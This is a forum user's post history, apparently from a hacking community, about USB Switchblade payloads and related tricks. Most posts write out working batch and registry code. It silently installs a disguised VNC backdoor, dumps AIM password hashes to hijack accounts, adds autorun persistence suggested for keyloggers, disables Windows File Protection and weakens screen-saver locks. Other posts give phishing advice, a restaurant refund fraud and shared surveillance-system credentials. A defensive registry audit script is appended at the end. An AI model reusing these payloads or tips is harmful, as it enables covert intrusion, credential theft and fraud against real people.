AndyzBong

Everything posted by AndyzBong

  1. I've got a couple more pictures to take but I figure that I might as well post my lame.. umm.. mod? http://andyzbong.angelfire.com/index.html I would just post the image but angelfire (yeah.. I know) would replace it with the "this image is hosted by angelfire" bs. Love it or hate it; I will be making a "wITTy" mod as well. If you're thinking of "T"; then you've never been to an ITT campus. - AndyzBong
  2. I know that I am about 10 days late to reply to this post, but http://canyouseeme.org is also a good site to use, other than http://portforward.com
  3. I agree with most that social engineering would be the best way to go about this. Perhaps a fake phishing email sent through an open mail relay server would be your best bet. You know him personally so you know the vulnerabilities in his character.
  4. Yes, just like in Space Rogue's article; you can use Google to view and move (PTZ) cameras. However, you will not be able to stop the recording or disable the surveillance system in any way. Actually, most of these "Google hack" cameras are meant to be viewed over the internet without a login or password; as they are always in "guest mode". You could DDoS the address; but even then, you're not "hacking" (and all recorded video events will still be on the local machine) - AndyzBong
  5. I'm in. And since I have already written an article for Analog5; I'm on the score board. This weekend I will write up another article; but me and Famicoman can't write an entire e-zine ourselves. Writing an article for Analog5 would be a great way to earn points.
  6. Howdy all, I recently was employed as a "Surveillance System Software Support Specialist" for a private video surveillance company here in Pa. Now, we all know that if you aim an infrared laser-pointer at an IR surveillance camera at night, you will completely "white out" the camera; but today I wanted to discuss some of the other vulnerabilities in not only the surveillance cameras, but the PC that runs the surveillance software. First off, all of our PCs are running Windows XP and automatically login to windows under an administrator account without password verification. The reason I was given for this; is so when there is a power outage the computer will automatically reboot when the UPS is out of battery and the power is restored. Good, great, grand, and wonderful... but it doesn't have to be an administrative user. However, I just do what I'm told. Secondly, when Windows XP boots the surveillance software runs on startup, logged in under "guest mode". Guest allows you to do nothing (such as Stop Monitoring, exit full screen mode, exit the software, etc). My boss thinks that "When you're logged in as guest, you cannot close the software or make any changes." However, you can run task manager and kill the process. Our software's process is not run under system it is run under the administrative user. Lastly, I do not install the surveillance cameras or run their conduit, but I have learned a lot about how surveillance cameras can pick up interference. A couple of our customers are machine shops (machinist), who want to keep a watchful eye on their carbide supply. The exterior of the building is usually aluminum and the welders like to ground their equipment to the beams of the building. This gives the entire building a negative charge which will go through the metal housing of the cameras and cause interference on the cameras that looks like HBO porn before a descrambler. 
I asked a camera installer if I put a 9v battery up to the housing of the camera, would it cause the same interference? His response was "I wouldn't doubt it." And our wireless cameras? Worse. Now this is not the same for every video surveillance company, just the companies that cheat their customers and fill up the pockets of the boss. We don't even use shielding for any of the cameras unless there is a cell phone base tower right next door to our customer (or some other equivalent of massive interference). One final note, the administrative login to ALL of our customers is "admin" and the administrative password to ALL of our customers is eight characters all lowercase. If you could run a dictionary attack on our software's login page, not only would you be in on one computer, but if you had a copy of our clients' DNS addresses... you'd be admin on them all. PS: Since our surveillance systems are PC-based, our customers enjoy monitoring their cameras from home via the internet. If one were to stumble upon their DNS address and reached a login page; one would only have to login as "guest" with no password in-order to view the cameras. Just like Space Rogue's write-up about Google hacking surveillance systems. http://www.spacerogue.net/wordpress/?p=38 - AndyzBong
  7. Howdy all, I always enjoy a new silent VNC server install via the USB switchblade, but I can never get them to work. I downloaded VNCHooks.dll and winvnc.exe (TightVNC Win32 Server) from http://www.tightvnc.com/download (tightvnc-1.3.9_x86.zip) and placed both of these files in my WIPCMDtvnc folder. (WIPCMD is my "payload folder" containing go.cmd and vnc.cmd) My vnc.cmd code looks like this: @echo off REM Silent Install of TightVNC server REM Script by kz26 REM Copy VNC Server Files xcopy tvncwinvnc.exe %systemroot% /c /y xcopy tvncVNCHooks.dll %systemroot% /c /y REM Install fake WinVNC service and import reg settings sc create winvnc binpath= "%systemroot%winvnc.exe -service" type= interact type= own start= auto displayname= "Domain Client Service" sc description winvnc "Manages communication between a Windows Server Domain Controller and a connected Domain Client. If this service is not started or disabled, domain functions will be inoperable." regedit.exe /s tvncreg1.reg regedit.exe /s tvncreg2.reg REM Port: 8080 REM Username: N/A REM Password: hacked net start winvnc :End exit This are my reg1.reg and reg2.reg code(s): reg1.reg Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3DisableTrayIcon DWORD "1"] [HKEY_CURRENT_USERSoftwareORL] [HKEY_CURRENT_USERSoftwareORLVNCHooks] [HKEY_CURRENT_USERSoftwareORLVNCHooksApplication_Prefs] [HKEY_CURRENT_USERSoftwareORLVNCHooksApplication_Prefswinvnc.exe] "use_GetUpdateRect"=dword:00000001 "use_Timer"=dword:00000000 "use_KeyPress"=dword:00000001 "use_LButtonUp"=dword:00000001 "use_MButtonUp"=dword:00000001 "use_RButtonUp"=dword:00000001 "use_Deferral"=dword:00000001 reg2.reg Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREORL] [HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3] "ConnectPriority"=dword:00000000 "DebugMode"=dword:00000000 "DebugLevel"=dword:00000002 "LoopbackOnly"=dword:00000000 "EnableHTTPDaemon"=dword:00000000 "EnableURLParams"=dword:00000000 "AllowLoopback"=dword:00000001 
"AuthRequired"=dword:00000001 [HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default] "QuerySetting"=dword:00000002 "QueryTimeout"=dword:0000001e "QueryAccept"=dword:00000000 "QueryAllowNoPass"=dword:00000000 "SocketConnect"=dword:00000001 "AutoPortSelect"=dword:00000000 "PortNumber"=dword:00001f90 "HTTPPortNumber"=dword:000016a8 "InputsEnabled"=dword:00000001 "LocalInputsDisabled"=dword:00000000 "IdleTimeout"=dword:00000000 "LockSetting"=dword:00000000 "RemoveWallpaper"=dword:00000001 "Password"=hex:77,96,ba,8c,c2,b3,68,07 "PasswordViewOnly"=hex:77,96,ba,8c,c2,b3,68,07 "PollUnderCursor"=dword:00000000 "PollForeground"=dword:00000001 "PollFullScreen"=dword:00000000 "OnlyPollConsole"=dword:00000001 "OnlyPollOnEvent"=dword:00000000 and finally, this is my go.cmd code that launches vnc.cmd: @echo [START Silent WinVNC Server Install] >> Documentslogfiles%computername%.log 2>&1 start /b .vnc.cmd @echo [End Silent WinVNC Server Install] >> Documentslogfiles%computername%.log 2>&1 :End exit This code is the last script to be autorun by my USB Switchblade; when it executes, the rest of my applications (FirePassword, netpass, iehv, etc) all work fine. Note: I added [HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3DisableTrayIcon DWORD "1"] to the reg1.reg file due to HALEN666's comment about this registry key disabling the WinVNC server icon from the system tray; but can't the same means be achieved by ResHacking winvnc.exe and replacing the WinVNC icon with a clear icon? - AndyzBong
  8. Hello all, Recently a friend of mine at ITT who works at McDonalds informed me of an interesting trick. This little "hack" allows you to get an additional Double-Quarter Pounder burger at McDonalds. You should really do this with two separate people on two separate orders. Step 1: Order a regular Quarter Pounder burger and a Double Quarter Pounder burger. (add other items if you wish to disguise the "hack") Step 2: Upon receiving your food, place your Quarter Pounder burger in the Double Quarter Pounder box and hide the double Quarter Pounder. Step 3: Tell cashier that there has been a mistake and you have received a regular Quarter Pounder instead of a double. (both the double and single sandwich come in the same "Quarter Pounder" box) Step 4: Receive another double Quarter Pounder in replacement of your single Quarter Pounder. You now have two double Quarter Pounder McDonald burgers. Enjoy, AndyzBong (information provided by Paul "Wall" P.)
  9. One of the more creative uses of the USB Switchblade is the Folding@Home capability. I once read an article about a software programmer who just happened to have SETI@Home installed on his wife's laptop that was stolen. Long story short, when the thieves logged into the internet with the stolen laptop and the screen-saver was activated, SETI went into effect. The laptop automatically logged itself into the SETI@Home account and displayed its new IP. The ISP was contacted, records were seized, thieves got arrested, the laptop got returned. I do not know why you would go through all this trouble for (what should be) a 512mb flash-drive. If you are worried about a lost Switchblade and revenge is your primary concern; I would set the payload to e-mail you (a junk Yahoo account) the captured logs/passwords (as well as store them on the USB). It may not be stealthy, but I hope it helped. Here's the SETI article: http://www.virtuallystrange.net/ufo/update...b/m15-005.shtml
  10. Kimberly might not be too happy to find out that her full name and work email are so public. Very nice find secret52.
  11. I have heard of such "EXE Binders" being used to combine animated greeting-card software and trojan horse servers. Wikipedia "File Binder". As far as a *.jpeg file being bound with an *.exe ... I do have to admit; I have downloaded such a program. Anti-Virus caught it and I decided not to test it out. DLL Injections are cooler anyways. - AndyzBong
  12. Enlightened about the quotations, gotta read my Windows CL book more.... I knew the /y was supposed to go in there somewhere. Thanks GonZor; this is why I am a Hackling and you are a Zombie.
  13. So I've been messing around lately with a couple of home-brew payload additions for my USB Switchblade and I decided that I wanted one of my particular payloads to be dumped in my "victims" Startup folder (for execution upon the next reboot). Note: My payload addition is just a harmless prank for a friend of mine. All the program does is continually loop vbCritical MsgBoxs that say "Your system is critically running low on virtual memory!". Hence the program is named VirtuMem.exe It all seemed simple enough right? copy H:WIPCMDVirtuMem.exe C:Documents and SettingsAll UsersStart MenuProgramsStartup Nope! Incorrect syntax. So I tried copy H:WIPCMDVirtuMem.exe C: and... tada! Either my syntax is wrong (please feel free to enlighten me) or I had to find another solution around this. Anywho, if you are familiar with SysInternal's freeware program called AutoRuns; then you know that applications such as AIM, QuickTime, Symantec, and other software-vendors can autorun their applications upon login without having a .LNK file in the Startup folder. My solution to the problem was merely to copy a version of VirtuMem into my WIPCMD folder and create a *.reg file (named startup.reg) like so: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] "VirtuMem"="C:WINDOWSSYSTEM32VirtuMem.exe" and then add the following code to my go.cmd file: @echo [START AutoRun VirtuMem via RegEdit] >> Documentslogfiles%computername%.log 2>&1 echo. >> Documentslogfiles%computername%.log 2>&1 copy H:WIPCMDVirtuMem.exe C:WINDOWSSYSTEM32 regedit.exe /s WIPCMDstartup.reg echo. >> Documentslogfiles%computername%.log 2>&1 @echo [END AutoRun VirtuMem via RegEdit] >> Documentslogfiles%computername%.log 2>&1 I just figure it was a neat trick that I would share with the community. This would work well for keyloggers or any other applications that you may want to run at startup, without keeping the file in the Startup folder. 
This also could be used for non-malicious purposes... I can clearly see the teenage computer network lab technician who hates the WeatherBug's autorun on all the campus lab computers due to AOL Instant Messenger (and deleting the registry values instead of importing them). Final Note: I have not yet tried this on my "friend". I am not responsible for you screwing up your Windows Registry and not making backups of your vast pr0n collection or your Windows Registry. I will let you know how the results go, but so far; this code is untested. In conclusion, if you have a different way around Startup, or if my syntax is completely wrong, or if I am completely wrong, or if you've liked this minor piece of info; let me know. This code is for Windows XP Pro (as far as I know). Peace. - AndyzBong
  14. Try Googling "Hexing Your Malware" (without the quotations). This was a suggestion that I read off a post in the old forums. The first link from GovernmentSecurity.org is a forum post with horrible spelling mistakes. I deciphered the instructions, downloaded Hex Workshop, tested, failed, retested, failed, re-retested, failed. (You get the idea?) So I do not suggest that particular article, but there are about 297,000 results so have fun experimenting.... oh.. and deciphering. - AndyzBong
  15. Unless you have read my previous post (from a while back) concerning the extraction and exploitation (via the USB Switchblade) of AIM 5.9 encrypted passwords, I suggest reading it before continuing: http://forums.hak5.org/index.php/topic,4398.0.html This should give you a basic understanding of the concept. Anyways, for those of you who are familiar with my previous post, this is merely an update that you can add to your go.cmd file to extract AIM 6.0 encrypted passwords and exploit them to sign-on as "hacked screen-names". The technique of importing the AIM registry information properly (at your computer) takes a few attempts to get it down pat, so be patient. I suggest exiting out of any AIM clients, and repeatedly checking RegEdit to see if the encrypted password has still been entered. Finally, I must again stress that this exploit is more of a DoS attack or could possibly serve as a social engineering attack (by impersonating the "hacked" victim. Once you have the encrypted password, you cannot change it, you can only kick the screen-name off-line when the AOL System Manager informs you that "You are now signed-on in two locations. Press 1 to disconnect your other connection." The new code to add is as follows: regedit.exe /E Documentslogfilesaim6pass.txt "HKEY_CURRENT_USERSoftwareAmerica OnlineAIM6Passwords" regedit.exe /E Documentslogfilesaim6hashpass.txt "HKEY_CURRENT_USERSoftwareAmerica OnlineAIM6HashedPasswords" Your complete AIM 5.9 & AIM 6.0 go.cmd code should look like: @echo [AIM 5.9 &amp; 6.0 Encrypted Password Dump] &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 echo. 
&gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 regedit.exe /E Documentslogfilesaim59dump.reg "HKEY_CURRENT_USERSOFTWAREAmerica OnlineAOL Instant Messenger (TM)CurrentVersionusers" TYPE Documentslogfilesaim59dump.reg | find "Password1" &gt;&gt; Documentslogfiles%computername%.log regedit.exe /E Documentslogfilesaim6pass.txt "HKEY_CURRENT_USERSoftwareAmerica OnlineAIM6Passwords" regedit.exe /E Documentslogfilesaim6hashpass.txt "HKEY_CURRENT_USERSoftwareAmerica OnlineAIM6HashedPasswords" echo. &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 @echo [END AIM 5.9 &amp; 6.0 Encrypted Password Dump] &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1 Like I previously stated, this a great alternative to MessenPass (due to some Anti-Viruses being able to detect MessenPass and it's inability to decrypt passwords for versions of AIM beyond 5.5). If you are having trouble, please leave a detail description of what the problem is, and I will try my best to help. Lastly, and the kind of interesting part. AIM 5.9 profile files are stored on the oscar.aim.com server (correct me if I am wrong) and are "roaming profiles" ; similar to "roaming buddy-lists" (you can sign on from any location and still have your profile and buddy-list). AIM 6.0 however, stores your profile information locally in a file called common.cls in the directory: C:Documents and Settings<username>local settingsapplication dataaol ocpaimstoragedata<screen-name>local storage Common.cls appears as a Visual Basic module, I could not open it with VB6, so use ole' trusty Notepad. When you sign on a "hacked" AIM 6.0 screen-name you can (remotely) change the victim's profile, save it, and it will change the data in the common.cls file (as well as be their new profile). (Search for <HTML> in common.cls to find the profile beginning). The great part is, if you have physical access to the machine (since you're using you're USB Switchblade and all) you can set common.cls to "Read-Only". Enjoy! 
- AndyzBong
  16. Hey all, I ran across an interesting open-source project for Linux called "The Law Enforcement and Forensic Examiner Intro to Linux" at ftp://ftp.hq.nasa.gov/pub/ig/ccd/linuxintro/. I was just wondering if anyone has used this particular set of "tools and hands on projects"? Thoughts? Etc.. Also, this is going to be a really dumb question. I was bored the other day and visiting MySpace.com servers and sub-directories and I found this page on (what I believe to be the web-server of their "image server"(?) Anyways, here is the link. I'm interested in your opinions as to what "heartbeat" is and correcting all of my misinformation. Is it just some random web-server junk? http://a409.ac-images.myspacecdn.com - AndyzBong
  17. So I finally got some time off from class and I noticed that no one has added anything to this discussion, so why not do some experimentation? All of the registry information/ideas that I mentioned above are useless, as the U3 will just not autorun while the XP system is running a password protected screensaver. My final suggestion would be importing a screensaver "grace period" registry file via go.cmd Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] "ScreenSaverGracePeriod"="120" This way, if you are able to insert the switchblade before the screensaver kicks in; but are unable to access the mouse (which would deactivate the idle countdown) before the password-protected screensaver activates, you won't have to login. NOTE: You can enter any whole number between 0 and 2,147,483 (approximately 24 days). A value of zero indicates no password protection delay and there is no default entry.
  18. The setting that controls whether a login should be performed when a workstation is unlocked or when a password-enabled screen saver is used is located in the registry value "ForceUnlockLogon" under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon. If you modify the data from a 0 to a 1 it will no longer require a login. I am not sure if you can change this registry data while the password-protected screen saver is running (as my go.cmd did not launch during a password-protected screen saver) but that's a good first experiment. Also, screen savers are considered operating system files and are "protected" from being deleted or overwritten. They are located in the Windows\System32 and Windows\System32\dllcache folders. Like disabling the login, I am not sure if you would be able to delete these files while the screen saver is actively running. You could also attempt the registry value that controls whether screen savers are actively enabled. This registry value is "ScreenSaveActive" and is located in HKEY_USERS\.DEFAULT\Control Panel\Desktop (0 = disabled, 1 = enabled). Hope this gets someone off to a creative way around this.
  19. Keymail: Howdy folks, I was wondering if anyone has implemented Keymail into their USB Switchblade package? If so, what have the results been (detection by anti-virus, performance, etc)? Thanks all.
  20. I was wondering how exactly I go about viewing possible unencrypted passwords in the pagefile.sys file. I know that I would need a Linux Live CD in order to extract the file, but would I need forensic software to view the plain-text passwords? Any links or info would be greatly appreciated.
  21. A while back I was reading root-ftw's post ownage and became interested in the idea of safely modifying the ntoskrnl boot image via the USB Switchblade. (mine is a simple "Got Owned?" image) You will need (these all go in WIPCMD): 1. a ResHacked copy of ntoskrnl (name it nt0skrnl) 2. a modified copy of BOOT.ini 3. a .bat file called nt0skrnl.bat Software you will need: 1. Adobe Photoshop, Paint Shop Pro, or similar. 2. ResHack (ResHack) 3. HexEdit (optional) First open up Adobe Photoshop or Paint Shop Pro to create your custom boot image. The image has to be a 640x480 bitmap with a 16-color palette. NOT 16-bit colors, but a 16-color palette (meaning the entire image is only made up of 16 colors). You cannot use MS Paint because it uses a 24-color palette by default. I suggest making your own boot image, rather than downloading an image from a website. If your 16-color palette is made up of custom RGB colors, you have to do some hexediting to ntoskrnl. More information about making a custom image can be found here. After you have created your image, you will need a copy of ntoskrnl to modify with ResHack. Paste a copy of ntoskrnl.exe into your WIPCMD folder and open it with ResHack. The Windows XP boot image resource is located in Bitmap : 1 : 1033. On the menu bar click Action : Replace Bitmap, select your custom image, and save your modified ntoskrnl as nt0skrnl. If you are still having trouble using ResHack and ntoskrnl, more information can be found here. Next, open notepad in WIPCMD and create a BOOT.ini file with the following code: [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)WINDOWS="Microsoft Windows XP Professional" /fastdetect /kernel=nt0skrnl.exe This method of delivery will be a lot safer than simply renaming the ntoskrnl file and replacing it with the modified version. 
Finally you will need to create a batch file named nt0skrnl.bat with the following code: @echo off ATTRIB -r -s -h C:BOOT.ini RENAME C:BOOT.ini BOOT.bak COPY /y H:WIPCMDBOOT.ini C: COPY /y H:WIPCMDnt0skrnl.exe C:WINDOWSsystem32 exit Now simply call the nt0skrnl.bat file from go.cmd and on the next reboot, your custom image will be displayed. If the computer you are doing this to has multiple partitions, or has XP installed on a drive other than C: you will need to change the code... duh. I also realize that this is "lame" and "malicious", so deal.
  22. haxorflakes, You might find some help in one of my previous posts concerning extracting the encrypted passwords for AIM 5.9: "AIM 5.9 encrypted password extract". All you would have to do is possibly modify the location of the registry values and/or the keyword "Password1" that go.cmd uses to find the encrypted AIM password value.
  23. In-order to modify explorer.exe you need a copy of ResHack (http://www.angusj.com/resourcehacker/). The "Start" button resource is located in String Table : 38 : 1033. Simply edit the copy of explorer.exe in your WIPCMD folder and save the changes. NOTE: If you are going to add the code I mentioned in the above post to your go.cmd payload, make sure that you add it as the last program to run. Since the code kills the explorer.exe process; it is NOT silent. I have decided to modify my own code and copy the essential files to the 'victim' Startup folder, so that the Start button modification takes place upon the next reboot, and the Switchblade can run silently. Changing the Start Button (http://www.overclockersclub.com/guides/xpstartbutton.php) Disabling Windows File Protection (http://www.microsoft.com/whdc/archive/wfp.mspx#ENAAC) PsKill (http://www.microsoft.com/technet/sysintern...ads/PsKill.mspx) Detailing Windows Explorer with ResHack (http://wint.virtualplastic.net/showtweak.php?tweak_id=56) Detailing Windows Explorer with ResHack #2 (http://wint.virtualplastic.net/showtweak.php?tweak_id=75)
  24. I decided to add code to my USB Switchblade that once inserted into a USB drive it would change the Start button into a Hak5 button. NOTE: This code does not work well with Portqry.exe (the self port scan program with the USB Switchblade). The Portqry.exe process hangs and once you kill the process, the code will continue. MAKE A BACKUP OF YOUR EXPLORER.EXE FILE BEFORE EVEN READING FURTHER! You will need 4 things (these all go in WIPCMD): 1. A registry file to import a key that disables Windows File Protection 2. A modified version of explorer.exe 3. A batch file to delay time when copying the modified explorer 4. A copy of Pskill First you must create a .reg file for disabling the Windows File Protection System and for disabling the prompt for Pskill. I decided to name this file wfpskill.reg and it includes the following registry keys: [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] "SFCDisable"=dword:000001 [HKEY_CURRENT_USERSoftwareSysinternalsPsKill] "EulaAccepted"=dword:00000001 Next you copy and paste explorer.exe into your WIPCMD folder and use ResHack to modify it's start button to whatever you want. Save the changes to explorer.exe Then create a batch file named blank.bat and a batch file named explorer.bat Blank.bat will be blank (duh), and explorer.bat will have the following code: @echo off regedit.exe /s WIPCMDwfpskill.reg pskill.exe explorer.exe RENAME C:WINDOWSsystem32dllcacheexplorer.exe explorer.bak COPY /y F:WIPCMDexplorer.exe C:WINDOWSsystem32dllcache TYPE NUL | F:WIPCMDblank.bat /N /CY /TY,5 &gt;NUL COPY /y F:WIPCMDexplorer.exe C:WINDOWS C:WINDOWSexplorer.exe exit Explorer.bat will disable the Windows File Protection System, kill the explorer process, rename the backup of explorer to explorer.bak, copy the modified explorer over, and restart the modified explorer process. Then simply call explorer.bat from the go.cmd script and you're good to go. 
This is for educational purposes only, as I read root-ftw's post entitled "ownage" and this is very similar and could be used with other ResHack projects. I am not responsible for any OS injuries. Mad props to KarmikTrance.
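
An added defensive example, not code from any of the posts above: a small audit of a regedit export (`.reg` text) for the registry changes described in posts 13, 17 and 24 (an autostart value under the HKLM Run key, `ScreenSaverGracePeriod`, and `SFCDisable` under Winlogon). The sample export, the allowed-directory baseline and the 5-second grace threshold are constructed assumptions.

```python
import re

# Constructed sample: a regedit export from a hypothetical workstation.
# In .reg files, backslashes inside string data are doubled.
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VendorAgent"="C:\\Program Files\\Vendor\\agent.exe"
"VirtuMem"="C:\\WINDOWS\\SYSTEM32\\VirtuMem.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="Explorer.exe"
"ScreenSaverGracePeriod"="120"
"SFCDisable"=dword:00000001
'''

RUN_KEY = r'hkey_local_machine\software\microsoft\windows\currentversion\run'
WINLOGON_KEY = r'hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon'
# Assumption: site baseline of directories autostart programs may live in.
ALLOWED_RUN_DIRS = ('c:\\program files\\',)

KEY_RE = re.compile(r'^\[(?P<key>[^\]]+)\]$')
VALUE_RE = re.compile(r'^"(?P<name>(?:[^"\\]|\\.)*)"=(?P<data>.*)$')


def decode(data):
    """Decode REG_DWORD and REG_SZ data; other types stay as raw text."""
    if data.startswith('dword:'):
        return int(data[6:], 16)
    if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
        return re.sub(r'\\(.)', r'\1', data[1:-1])  # undo \\ and \" escapes
    return data


def parse_reg(text):
    """Return {lowercased key path: {value name: decoded data}}."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            current = keys.setdefault(m.group('key').lower(), {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            current[m.group('name')] = decode(m.group('data'))
    return keys


def audit(text, allowed_dirs=ALLOWED_RUN_DIRS, max_grace=5):
    """Return a list of (finding, value name, data) tuples."""
    keys = parse_reg(text)
    findings = []

    # Autostart entries outside the baseline directories (post 13).
    for name, data in keys.get(RUN_KEY, {}).items():
        path = str(data).lstrip('"').lower()
        if not path.startswith(allowed_dirs):
            findings.append(('run-entry', name, data))

    # Registry value names are case-insensitive, so look them up lowercased.
    winlogon = {k.lower(): v for k, v in keys.get(WINLOGON_KEY, {}).items()}

    # A long grace period delays the screen-saver password prompt (post 17).
    grace = winlogon.get('screensavergraceperiod')
    if grace is not None:
        try:
            seconds = int(grace)
        except (TypeError, ValueError):
            seconds = None
        if seconds is None or seconds > max_grace:
            findings.append(('grace-period', 'ScreenSaverGracePeriod', grace))

    # Any non-zero SFCDisable means file protection was changed (post 24).
    sfc = winlogon.get('sfcdisable', 0)
    if sfc != 0:
        findings.append(('wfp-disabled', 'SFCDisable', sfc))
    return findings


if __name__ == '__main__':
    for finding in audit(SAMPLE_EXPORT):
        print(finding)
```
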